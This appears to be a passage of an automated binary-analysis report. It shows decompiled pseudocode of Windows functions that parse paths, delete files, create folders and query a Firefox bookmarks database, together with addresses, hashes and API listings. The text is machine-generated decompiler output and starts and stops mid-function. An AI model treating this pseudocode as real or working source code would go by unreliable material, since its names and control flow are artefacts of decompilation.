												_t90 = 0;
												continue;
											}
										} else {
											goto L62;
										}
									}
								}
								_t112 = 0x2e;
								if( *_t132 != _t112 || _t132[0] != _t112) {
									goto L49;
								} else {
									if(_t180 <= _t178) {
										L44:
										_t107 = _v8;
										if(_t170 == 0) {
											L42:
											_t132 =  &(_t132[1]);
											goto L23;
										}
										_t41 = _t170 + 2; // 0x2
										_t132 = _t41;
										goto L23;
									}
									if(E00C83D00(_t178) != 0) {
										_t170 = _v28;
										goto L44;
									}
									_t184 =  &(_t180[0]);
									if(_t178 >= _t184) {
										L37:
										_t185 = 0;
										L38:
										_a4 = _t185;
										_t156 = 0x104;
										if(_t185 == 0) {
											_t180 = _t178;
											_a4 = _t180;
										} else {
											_t156 = 0x104 - (_t185 - _t178 >> 1);
										}
										_v12 = _t156;
										_v16 = _t156;
										_t107 = E00C83AA8(_t180, _t156, 0xc81744);
										_v8 = _t107;
										goto L42;
									}
									_t118 = 0x5c;
									while(1) {
										_t185 = _t184 - 2;
										if( *_t185 == _t118) {
											goto L38;
										}
										if(_t178 < _t185) {
											continue;
										}
										goto L37;
									}
									goto L38;
								}
							}
							_t119 = 0x2e;
							if( *_t132 != _t119) {
								goto L49;
							}
							if(_t170 == 0) {
								_t132 =  &(_t132[0]);
								if(_t180 <= _t178 || E00C83D00(_t178) != 0) {
									L22:
									_t107 = _v8;
								} else {
									_t180 = _t180 - 2;
									_t122 = _v16 + 1;
									_a4 = _t180;
									_v16 = _t122;
									_v12 = _t122;
									_t107 = E00C83AA8(_t180, _t122, 0xc81744);
									_v8 = _t107;
								}
								goto L23;
							}
							_t26 = _t170 + 2; // 0x2
							_t132 = _t26;
							goto L22;
						}
					}
					_t151 = _t170 - _t132;
					goto L16;
				}
				_t134 = _v8;
				goto L69;
			}

0x00c84092
0x00c8409b
0x00c840a0
0x00c840a5
0x00c84362
0x00c84362
0x00c840ac
0x00c840b4
0x00c840b6
0x00c840b9
0x00c840c3
0x00c840ed
0x00c840f8
0x00c84102
0x00c8412b
0x00c84104
0x00c84104
0x00c84107
0x00c84117
0x00c8411b
0x00c84120
0x00c84122
0x00c84122
0x00c84120
0x00c84117
0x00c840c5
0x00c840c5
0x00c840d7
0x00c840dc
0x00c840df
0x00c840e2
0x00c840e8
0x00c840e8
0x00c84137
0x00c8433e
0x00c8434a
0x00c8434f
0x00c84357
0x00c84359
0x00c84359
0x00c8435c
0x00000000
0x00c8435c
0x00c8413d
0x00c8413f
0x00c84142
0x00c84144
0x00c84148
0x00000000
0x00000000
0x00c84156
0x00c84158
0x00c8415f
0x00c84167
0x00c8416c
0x00c8416f
0x00c8416f
0x00c84172
0x00c84175
0x00c8417b
0x00c8417e
0x00c8417e
0x00c84180
0x00c84189
0x00c84337
0x00000000
0x00c8419b
0x00c8419e
0x00c841fa
0x00c8428d
0x00c84291
0x00c84295
0x00c84297
0x00c84298
0x00c84298
0x00c84295
0x00c8429b
0x00c842a1
0x00c842ab
0x00c842b0
0x00c842b3
0x00c842b5
0x00c842be
0x00c84317
0x00c8431a
0x00000000
0x00c842c5
0x00c842c7
0x00c842cb
0x00000000
0x00000000
0x00c842cd
0x00c842d4
0x00c8432b
0x00c8432b
0x00c84330
0x00c84332
0x00c84368
0x00c8436a
0x00000000
0x00000000
0x00c8436e
0x00c8439b
0x00c8439b
0x00c8439f
0x00c843a2
0x00c843a2
0x00c843a5
0x00c843a8
0x00c843b4
0x00c843b9
0x00c843d0
0x00c843d0
0x00c843d6
0x00c843da
0x00c843de
0x00c843e1
0x00c843e1
0x00c843e7
0x00c843ec
0x00c843f6
0x00c843fa
0x00c843fa
0x00c843fe
0x00000000
0x00c843fe
0x00c84370
0x00c84375
0x00c84379
0x00000000
0x00000000
0x00c8437b
0x00c8437f
0x00c84386
0x00000000
0x00000000
0x00c8438a
0x00c8438d
0x00c84392
0x00000000
0x00000000
0x00000000
0x00c84394
0x00c84398
0x00000000
0x00c84398
0x00c842d8
0x00c842dc
0x00c842e6
0x00c842e9
0x00c842ef
0x00c8431d
0x00c8431d
0x00c84320
0x00000000
0x00c842fc
0x00c842fc
0x00c842ff
0x00c84303
0x00c84306
0x00c84309
0x00c8430c
0x00c8430f
0x00c84312
0x00c84323
0x00c84323
0x00c841b6
0x00c841b8
0x00000000
0x00000000
0x00c841be
0x00000000
0x00c841be
0x00000000
0x00000000
0x00000000
0x00c842dc
0x00c842be
0x00c84202
0x00c84206
0x00000000
0x00c84216
0x00c84218
0x00c8427c
0x00c8427c
0x00c84281
0x00c84271
0x00c84271
0x00000000
0x00c84271
0x00c84283
0x00c84283
0x00000000
0x00c84283
0x00c84223
0x00c84279
0x00000000
0x00c84279
0x00c84225
0x00c8422a
0x00c8423b
0x00c8423d
0x00c8423f
0x00c8423f
0x00c84242
0x00c84249
0x00c84255
0x00c84257
0x00c8424b
0x00c84251
0x00c84251
0x00c8425a
0x00c8425f
0x00c84269
0x00c8426e
0x00000000
0x00c8426e
0x00c8422e
0x00c8422f
0x00c8422f
0x00c84235
0x00000000
0x00000000
0x00c84239
0x00000000
0x00000000
0x00000000
0x00c84239
0x00000000
0x00c8422f
0x00c84206
0x00c841a2
0x00c841a6
0x00000000
0x00000000
0x00c841ae
0x00c841c2
0x00c841c7
0x00c841b3
0x00c841b3
0x00c841d4
0x00c841d7
0x00c841da
0x00c841db
0x00c841e5
0x00c841ea
0x00c841ed
0x00c841f2
0x00c841f2
0x00000000
0x00c841c7
0x00c841b0
0x00c841b0
0x00000000
0x00c841b0
0x00c84189
0x00c84163
0x00000000
0x00c84163
0x00c84365
0x00000000

APIs

iswalpha.MSVCRT ref: 00C8410E
wcschr.MSVCRT ref: 00C84150

Part of subcall function 00C83D00: iswalpha.MSVCRT ref: 00C83D26

Strings

::$DATA, xrefs: 00C843BD
\\?\, xrefs: 00C840EF

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: iswalpha$wcschr
String ID: ::$DATA$\\?\
API String ID: 2247047535-2521888196
Opcode ID: 4e9ff4f44b9e65fb8799da7f6e4c28c23483fffd9e834c4f901d7b757096e4da
Instruction ID: de9f4683139644654426872b78c9748b63d019dd40aadb767276d2d99eb08912
Opcode Fuzzy Hash: 4e9ff4f44b9e65fb8799da7f6e4c28c23483fffd9e834c4f901d7b757096e4da
Instruction Fuzzy Hash: 59B1C471E00216EBCF28FF64C8416AEB7B5FF54718B24816AE855DB250E7709F80D798

Uniqueness

Uniqueness Score: -1.00%

Function 00C835EE, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00C835EE(struct HINSTANCE__* __ecx, int __edx) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				signed int _v1572;
				intOrPtr _v1576;
				WCHAR* _v1580;
				struct HINSTANCE__* _v1584;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t38;
				signed int _t39;
				struct _SECURITY_ATTRIBUTES* _t41;
				int _t47;
				intOrPtr _t50;
				struct HINSTANCE__* _t51;
				int _t52;
				intOrPtr _t61;
				struct HINSTANCE__* _t62;
				struct HINSTANCE__* _t63;
				int _t64;
				void* _t65;
				intOrPtr _t66;
				signed int _t67;

				_t60 = __edx;
				_v8 =  *0xc86004 ^ _t67;
				_t51 = __ecx;
				_t64 = __edx;
				_v1584 = __ecx;
				_v1580 = __edx;
				if(LoadStringW(__ecx, 0x5601,  &_v1048, 0x104) == 0) {
					_t61 = 0x80004005;
					_v1576 = 0x80004005;
				} else {
					_t60 =  &_v528;
					_t50 = E00C83407(_t51, _t64,  &_v528,  &_v1048);
					_t61 = _t50;
					_v1576 = _t50;
				}
				if(_t61 < 0) {
					L21:
					return E00C84AAD(_t61, _t51, _v8 ^ _t67, _t60, _t61, _t64);
				} else {
					_t65 = 0x5610;
					do {
						_t60 = _v1580;
						E00C83472(_t51, _v1580, _t61, _t65);
						_t65 = _t65 + 1;
					} while (_t65 <= 0x5613);
					_v1572 = _v1572 & 0x00000000;
					_t52 = 0x5630;
					_t62 = _v1584;
					_t66 = _v1580;
					do {
						if(LoadStringW(_t62, _t52,  &_v1048, 0x104) == 0) {
							_t38 = 0x80004005;
						} else {
							_t60 =  &_v1568;
							_t38 = E00C83407(_t52, _t66,  &_v1568,  &_v1048);
						}
						if(_t38 < 0) {
							_t39 = _v1572;
						} else {
							_t47 = PathFileExistsW( &_v1568);
							_t39 = _v1572;
							if(_t47 != 0) {
								_t39 = _t39 + 1;
								_v1572 = _t39;
							}
						}
						_t52 = _t52 + 1;
					} while (_t52 <= 0x5631);
					_t61 = _v1576;
					_t64 = 0x5630;
					if(_t39 < 2) {
						goto L21;
					}
					_t41 = PathFileExistsW( &_v528);
					if(_t41 != 0 || CreateDirectoryW( &_v528, _t41) != 0) {
						_t63 = _v1584;
						do {
							_t60 = _v1580;
							E00C83528(_t63, _v1580, _t63,  &_v528, _t64);
							_t64 = _t64 + 1;
						} while (_t64 <= 0x5631);
						_t61 = _v1576;
					}
					goto L21;
				}
			}

0x00c835ee
0x00c83600
0x00c83611
0x00c83619
0x00c8361b
0x00c83622
0x00c83630
0x00c83650
0x00c83655
0x00c83632
0x00c8363b
0x00c83641
0x00c83646
0x00c83648
0x00c83648
0x00c8365d
0x00c8375a
0x00c8376c
0x00c83663
0x00c83663
0x00c83668
0x00c83668
0x00c83671
0x00c83676
0x00c83677
0x00c8367f
0x00c83686
0x00c8368b
0x00c83691
0x00c83697
0x00c836ad
0x00c836c5
0x00c836af
0x00c836b8
0x00c836be
0x00c836be
0x00c836cc
0x00c836ee
0x00c836ce
0x00c836d5
0x00c836dd
0x00c836e3
0x00c836e5
0x00c836e6
0x00c836e6
0x00c836e3
0x00c836f4
0x00c836f5
0x00c836fd
0x00c83703
0x00c8370b
0x00000000
0x00000000
0x00c83714
0x00c8371c
0x00c83730
0x00c83736
0x00c83736
0x00c83746
0x00c8374b
0x00c8374c
0x00c83754
0x00c83754
0x00000000
0x00c8371c

APIs

LoadStringW.USER32(?,00005601,?,00000104), ref: 00C83628
LoadStringW.USER32(?,00005630,?,00000104), ref: 00C836A5
PathFileExistsW.SHLWAPI(?), ref: 00C836D5
PathFileExistsW.SHLWAPI(?), ref: 00C83714
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C83726

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: ExistsFileLoadPathString$CreateDirectory
String ID:
API String ID: 2019810426-0
Opcode ID: cb41e06a9f992f757b3f55af5677f3c646f5ced9380e06ba9246939f93b3d3c9
Instruction ID: c8fe080357a4742231ac4078b55d8510f460323683743dbd6f9a65f0ba5804cb
Opcode Fuzzy Hash: cb41e06a9f992f757b3f55af5677f3c646f5ced9380e06ba9246939f93b3d3c9
Instruction Fuzzy Hash: B04196B1A005689BDB20EF25CC44B9EB7B9EB88714F1051E5E519E7240E731DF918F68

Uniqueness

Uniqueness Score: -1.00%

Function 00C83EE7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00C83EE7(signed short** __edx) {
				wchar_t* _v8;
				signed short** _v12;
				void* __ecx;
				void* _t17;
				void* _t18;
				signed short* _t19;
				signed short* _t20;
				int _t22;
				signed short* _t25;
				wchar_t* _t26;
				signed short* _t28;
				intOrPtr* _t31;
				signed short* _t32;
				wchar_t* _t40;
				intOrPtr* _t45;
				long* _t51;
				void* _t52;
				long _t55;
				signed short* _t59;
				wchar_t* _t61;

				_push(_t32);
				_push(_t32);
				_t59 = _t32;
				_v12 = __edx;
				if(_t59 == 0 ||  *_t59 == 0 || __edx == 0) {
					L26:
					_t17 = 0x80070057;
				} else {
					 *__edx = 0;
					_t18 = E00C83CA0(_t59,  &_v8);
					_t55 = 0x5c;
					if(_t18 == 0) {
						__eflags =  *_t59 - _t55;
						if(__eflags != 0) {
							L16:
							_t19 = E00C8476C(_t59, __eflags);
							__eflags = _t19;
							if(_t19 == 0) {
								_t20 = E00C846C3(_t59, L"\\\\?\\", 4);
								__eflags = _t20;
								if(_t20 != 0) {
									_t59 =  &(_t59[4]);
									__eflags = _t59;
								}
								_t22 = iswalpha( *_t59 & 0x0000ffff);
								__eflags = _t22;
								if(_t22 == 0) {
									goto L26;
								} else {
									__eflags = _t59[1] - 0x3a;
									if(_t59[1] != 0x3a) {
										goto L26;
									} else {
										_t59 =  &(_t59[2]);
										__eflags = _t59;
										goto L23;
									}
								}
							} else {
								_t59 =  &(_t59[0x30]);
								L23:
								__eflags =  *_t59 - _t55;
								if( *_t59 == _t55) {
									goto L24;
								}
								goto L25;
							}
						} else {
							__eflags = _t59[1] - _t55;
							if(__eflags != 0) {
								goto L24;
							} else {
								goto L16;
							}
						}
					} else {
						_t61 = _v8;
						_t31 = wcschr(_t61, _t55);
						if(_t31 == 0) {
							_t40 = _t61;
							__eflags = 0;
							_t51 =  &(_t40[0]);
							do {
								_t25 =  *_t40;
								_t40 =  &(_t40[0]);
								__eflags = _t25;
							} while (_t25 != 0);
							_t59 = _t61 + (_t40 - _t51 >> 1) * 2;
						} else {
							_t4 = _t31 + 2; // 0x2
							_t26 = _t4;
							_v8 = _t26;
							_t59 = wcschr(_t26, _t55);
							if(_t59 == 0) {
								_t45 = _t31;
								__eflags = 0;
								_t7 = _t45 + 2; // 0x2
								_t52 = _t7;
								do {
									_t28 =  *_t45;
									_t45 = _t45 + 2;
									__eflags = _t28;
								} while (_t28 != 0);
								_t59 = _t31 + (_t45 - _t52 >> 1) * 2;
							} else {
								if(_t59 != _v8) {
									L24:
									_t59 =  &(_t59[1]);
								}
							}
						}
						L25:
						 *_v12 = _t59;
						_t17 = 0;
					}
				}
				return _t17;
			}

0x00c83eec
0x00c83eed
0x00c83ef0
0x00c83ef4
0x00c83efa
0x00c83fed
0x00c83fed
0x00c83f13
0x00c83f13
0x00c83f1a
0x00c83f21
0x00c83f24
0x00c83f93
0x00c83f96
0x00c83f9e
0x00c83fa0
0x00c83fa5
0x00c83fa7
0x00c83fb7
0x00c83fbc
0x00c83fbe
0x00c83fc0
0x00c83fc0
0x00c83fc0
0x00c83fc7
0x00c83fce
0x00c83fd0
0x00000000
0x00c83fd2
0x00c83fd2
0x00c83fd7
0x00000000
0x00c83fd9
0x00c83fd9
0x00c83fd9
0x00000000
0x00c83fd9
0x00c83fd7
0x00c83fa9
0x00c83fa9
0x00c83fdc
0x00c83fdc
0x00c83fdf
0x00000000
0x00000000
0x00000000
0x00c83fdf
0x00c83f98
0x00c83f98
0x00c83f9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83f9c
0x00c83f26
0x00c83f26
0x00c83f31
0x00c83f37
0x00c83f78
0x00c83f7a
0x00c83f7c
0x00c83f7f
0x00c83f7f
0x00c83f82
0x00c83f85
0x00c83f85
0x00c83f8e
0x00c83f39
0x00c83f39
0x00c83f39
0x00c83f3e
0x00c83f47
0x00c83f4d
0x00c83f5d
0x00c83f5f
0x00c83f61
0x00c83f61
0x00c83f64
0x00c83f64
0x00c83f67
0x00c83f6a
0x00c83f6a
0x00c83f73
0x00c83f4f
0x00c83f52
0x00c83fe1
0x00c83fe1
0x00c83fe1
0x00c83f52
0x00c83f4d
0x00c83fe4
0x00c83fe7
0x00c83fe9
0x00c83fe9
0x00c83f24
0x00c83ff8

APIs

wcschr.MSVCRT ref: 00C83F2B
wcschr.MSVCRT ref: 00C83F41

Strings

\\?\, xrefs: 00C83FB0

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr
String ID: \\?\
API String ID: 1497570035-4282027825
Opcode ID: ff3fa46a9ca0decb39ea6d8cac45bb80b79416868d82c1296420e468e524d629
Instruction ID: 335f30c1b8208084be3011f74d067b4210d82dd4c60adadea53a71278336a5b9
Opcode Fuzzy Hash: ff3fa46a9ca0decb39ea6d8cac45bb80b79416868d82c1296420e468e524d629
Instruction Fuzzy Hash: A2316932E002519BDF34BB95880197F73B0DB40F5871640AEFE169B680E762AF01C3D8

Uniqueness

Uniqueness Score: -1.00%

Function 00C83472, Relevance: 6.1, APIs: 4, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00C83472(struct HINSTANCE__* __ecx, short* __edx, void* __edi, int _a4) {
				signed int _v8;
				short _v528;
				short _v1048;
				void* __esi;
				void* _t21;
				WCHAR* _t25;
				int _t27;
				void* _t30;
				WCHAR* _t31;
				signed int _t32;

				_t30 = __edi;
				_t29 = __edx;
				_v8 =  *0xc86004 ^ _t32;
				_t31 = __edx;
				if(LoadStringW(__ecx, _a4,  &_v1048, 0x104) == 0) {
					_t15 = 0x80004005;
				} else {
					_t29 =  &_v528;
					_t15 = E00C83407(_t21, _t31,  &_v528,  &_v1048);
				}
				if(_t15 < 0) {
					L10:
					return E00C84AAD(_t15, _t21, _v8 ^ _t32, _t29, _t30, _t31);
				} else {
					_t25 = _t31;
					_t29 =  &(_t25[1]);
					do {
						_t15 =  *_t25;
						_t25 =  &(_t25[1]);
					} while (_t15 != 0);
					_t27 = _t25 - _t29 >> 1;
					if(_t27 > 3 && StrCmpNW(_t31,  &_v528, _t27) == 0 && StrStrW( &_v528, L"..") == 0) {
						_t15 = DeleteFileW( &_v528);
					}
					goto L10;
				}
			}

0x00c83472
0x00c83472
0x00c83484
0x00c83493
0x00c834a2
0x00c834ba
0x00c834a4
0x00c834ad
0x00c834b3
0x00c834b3
0x00c834c1
0x00c83512
0x00c83520
0x00c834c3
0x00c834c3
0x00c834c5
0x00c834c8
0x00c834c8
0x00c834cb
0x00c834ce
0x00c834d5
0x00c834da
0x00c8350c
0x00c8350c
0x00000000
0x00c834da

APIs

LoadStringW.USER32(?,00C83676,?,00000104), ref: 00C8349A
StrCmpNW.SHLWAPI(?,?,?), ref: 00C834E5
StrStrW.SHLWAPI(?,00C81ACC), ref: 00C834FB
DeleteFileW.KERNEL32(?), ref: 00C8350C

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFileLoadString
String ID:
API String ID: 1470351836-0
Opcode ID: 02e2aa0efffa099d5aad107fe5e430e4cc1e20f07740c7fa14024dce3f61f357
Instruction ID: 18bcccbcfdc494cffe6d3b339d381a98bed7cab67dfaa71858a00693ca4794ba
Opcode Fuzzy Hash: 02e2aa0efffa099d5aad107fe5e430e4cc1e20f07740c7fa14024dce3f61f357
Instruction Fuzzy Hash: 7B11E3B5600218ABCB24EB60CC08BEE7BACDF84704F1042A9ED16C6141E734DF44DB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00C8480D, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C8480D() {
				signed int _t10;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				void* _t25;

				_t25 =  *0xc80000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0xc8003c; // 0xe0
					__eflags =  *((intOrPtr*)(_t19 + 0xc80000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0xc80000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0xc80018; // 0xb010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0xc80074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0xc80074)) > 0xe) {
								__eflags =  *(_t19 + 0xc800e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0xc80084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0xc80084)) > 0xe) {
									__eflags =  *(_t19 + 0xc800f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0xc86058 = _t10;
				__set_app_type(E00C84C48(1));
				 *0xc866b4 =  *0xc866b4 | 0xffffffff;
				 *0xc866b8 =  *0xc866b8 | 0xffffffff;
				 *(__p__fmode()) =  *0xc8606c;
				 *(__p__commode()) =  *0xc86060;
				_t15 = E00C84C8F();
				if( *0xc86000 == 0) {
					__setusermatherr(E00C84C8F);
				}
				E00C84E9F(_t15);
				return 0;
			}

0x00c84812
0x00c84819
0x00c8481f
0x00c84825
0x00c8482f
0x00000000
0x00c84831
0x00c84831
0x00c84831
0x00c84838
0x00c8483d
0x00c84859
0x00c8485b
0x00c84862
0x00c84864
0x00000000
0x00c84864
0x00c8483f
0x00c8483f
0x00c84844
0x00000000
0x00c84846
0x00c84846
0x00c84848
0x00c8484f
0x00c84851
0x00c8486a
0x00c8486a
0x00c8486a
0x00c8486a
0x00c8486a
0x00c8484f
0x00c84844
0x00c8483d
0x00c8481b
0x00c8481b
0x00c8481b
0x00c8481b
0x00c8486f
0x00c8487a
0x00c84880
0x00c84887
0x00c8489c
0x00c848aa
0x00c848ac
0x00c848b8
0x00c848bf
0x00c848c5
0x00c848c6
0x00c848cd

APIs

__set_app_type.MSVCRT ref: 00C8487A
__p__fmode.MSVCRT ref: 00C84890
__p__commode.MSVCRT ref: 00C8489E
__setusermatherr.MSVCRT ref: 00C848BF

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: 54eeccac86f84fd617d76f00d0c5cc46d0e4c99dd82659d6be4ad87174046bac
Instruction ID: b987ee3c288239e6687a52d9634dbf01ffd4908134f95f835e41472d0192b018
Opcode Fuzzy Hash: 54eeccac86f84fd617d76f00d0c5cc46d0e4c99dd82659d6be4ad87174046bac
Instruction Fuzzy Hash: 9D113030905342CFC7A8AB30D94D7283764BB4131EF34466AE526CA1E1EB368989DF1D

Uniqueness

Uniqueness Score: -1.00%

Function 00C82A22, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00C82A22(void* __ecx, void* __edi, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v2060;
				char _v2064;
				char _v2068;
				signed int* _v2072;
				signed int _v2076;
				void* __ebx;
				void* __esi;
				intOrPtr* _t40;
				signed int _t43;
				signed int _t44;
				void* _t45;
				void* _t46;
				signed int _t48;
				signed int _t49;
				void* _t50;
				intOrPtr _t59;
				void* _t70;
				void* _t71;
				char _t72;
				signed int _t74;
				intOrPtr _t81;

				_t71 = __edi;
				_t50 = __ecx;
				_v8 =  *0xc86004 ^ _t74;
				_v2072 = _a8;
				_t72 = 0;
				if(E00C8295F() == 0) {
					L11:
					return E00C84AAD(_t72, _t48, _v8 ^ _t74, _t69, _t71, _t72);
				}
				_v2068 = 0;
				_v2064 = 0;
				E00C82225( &_v2060, 0x400, L"select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes as a on b.id=ai.item_id and a.id=ai.anno_attribute_id where a.name=\'livemark/feedURI\' and b.id=%d", _a4);
				if(E00C82B5D(_t50,  &_v2060,  &_v2068) < 0 || E00C8259E(0xc86448, _v2068) < 0) {
					L10:
					E00C827B8( &_v2068, _t83);
					goto L11;
				} else {
					_push(0);
					_push(_v2068);
					if( *0xc864c4() > 0) {
						_t49 = 2;
						_t40 =  *0xc864e8(_v2068, _t49);
						_t13 = _t40 + 2; // 0x2
						_t70 = _t13;
						do {
							_t59 =  *_t40;
							_t40 = _t40 + _t49;
							_t81 = _t59;
						} while (_t81 != 0);
						_t43 = (_t40 - _t70 >> 1) + 1;
						_v2076 = _t43;
						_t69 = _t43 * _t49 >> 0x20;
						_t44 = _t43 * _t49;
						__imp__??2@YAPAXI@Z( ~(0 | _t81 > 0x00000000) | _t44);
						_t48 = _t44;
						if(_t48 != 0) {
							_t45 =  *0xc864e8(_v2068, 2);
							_t69 = _v2076;
							_t46 = E00C825DB(_t48, _v2076, _t45);
							_t83 = _t46;
							if(_t46 < 0) {
								__imp__??3@YAXPAX@Z(_t48);
							} else {
								_t72 = 1;
								 *_v2072 = _t48;
							}
						}
					}
					goto L10;
				}
			}

0x00c82a22
0x00c82a22
0x00c82a34
0x00c82a3c
0x00c82a42
0x00c82a4b
0x00c82b44
0x00c82b55
0x00c82b55
0x00c82a5a
0x00c82a6b
0x00c82a71
0x00c82a8e
0x00c82b39
0x00c82b3f
0x00000000
0x00c82aac
0x00c82aac
0x00c82aad
0x00c82abd
0x00c82ac1
0x00c82ac9
0x00c82ad1
0x00c82ad1
0x00c82ad4
0x00c82ad4
0x00c82ad7
0x00c82ad9
0x00c82ad9
0x00c82ae4
0x00c82ae5
0x00c82aeb
0x00c82aeb
0x00c82af5
0x00c82afb
0x00c82b00
0x00c82b0a
0x00c82b10
0x00c82b1b
0x00c82b20
0x00c82b22
0x00c82b32
0x00c82b24
0x00c82b2c
0x00c82b2d
0x00c82b2d
0x00c82b22
0x00c82b00
0x00000000
0x00c82abd

APIs

Part of subcall function 00C82225: _vsnwprintf.MSVCRT ref: 00C82257

??2@YAPAXI@Z.MSVCRT ref: 00C82AF5
??3@YAXPAX@Z.MSVCRT ref: 00C82B32

Strings

select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes, xrefs: 00C82A60

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@_vsnwprintf
String ID: select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes
API String ID: 1401084937-97930670
Opcode ID: 0e10f06107d400912977ea90ab41c5c2e793728de75487f4aae6a507aac5e3ae
Instruction ID: 21718b8bc214d21b2a82d0e51405073c640b3ae8b2f5b1b6107c298f67b38c20
Opcode Fuzzy Hash: 0e10f06107d400912977ea90ab41c5c2e793728de75487f4aae6a507aac5e3ae
Instruction Fuzzy Hash: AB3181716002199BDB14BF24DC4ABEE77ECFF04314F0081AAA94697191DE709E859F98

Uniqueness

Uniqueness Score: -1.00%

Function 00C83D00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00C83D00(signed short* __ecx) {
				signed short* _v8;
				signed short _t10;
				long _t11;
				void* _t13;
				signed short _t14;
				signed short _t16;
				signed short* _t21;
				signed int _t33;
				void* _t38;
				void* _t43;
				void* _t44;
				intOrPtr* _t46;

				_push(__ecx);
				_t46 = __ecx;
				if(__ecx == 0) {
					L21:
					_t10 = 0;
					__eflags = 0;
				} else {
					_t11 =  *__ecx & 0x0000ffff;
					if(_t11 == 0) {
						goto L21;
					} else {
						if(iswalpha(_t11) == 0 || E00C846C3(_t46 + 2, L":\\", 3) == 0) {
							_t13 = 0x5c;
							__eflags =  *_t46 - _t13;
							if( *_t46 != _t13) {
								L7:
								_t14 = E00C83CA0(_t46,  &_v8);
								__eflags = _t14;
								if(_t14 == 0) {
									__eflags = E00C846C3(_t46, L"\\\\?\\", 4);
									if(__eflags == 0) {
										L18:
										_t16 = E00C8476C(_t46, __eflags);
										__eflags = _t16;
										if(_t16 == 0) {
											goto L21;
										} else {
											_t43 = 0x5c;
											__eflags =  *((intOrPtr*)(_t46 + 0x60)) - _t43;
											if( *((intOrPtr*)(_t46 + 0x60)) != _t43) {
												goto L21;
											} else {
												__eflags =  *(_t46 + 0x62);
												if( *(_t46 + 0x62) == 0) {
													goto L4;
												} else {
													goto L21;
												}
											}
										}
									} else {
										__eflags = iswalpha( *(_t46 + 8) & 0x0000ffff);
										if(__eflags == 0) {
											goto L18;
										} else {
											__eflags = E00C846C3(_t46 + 0xa, L":\\", 3);
											if(__eflags != 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									}
								} else {
									_t21 = _v8;
									_t38 = 0;
									_t33 =  *_t21 & 0x0000ffff;
									__eflags = _t33;
									if(_t33 != 0) {
										_t44 = 0x5c;
										do {
											__eflags = _t33 - _t44;
											if(_t33 != _t44) {
												goto L13;
											} else {
												_t38 = _t38 + 1;
												__eflags = _t38 - 1;
												if(_t38 > 1) {
													goto L21;
												} else {
													__eflags = _t21[1];
													if(_t21[1] == 0) {
														goto L21;
													} else {
														goto L13;
													}
												}
											}
											goto L22;
											L13:
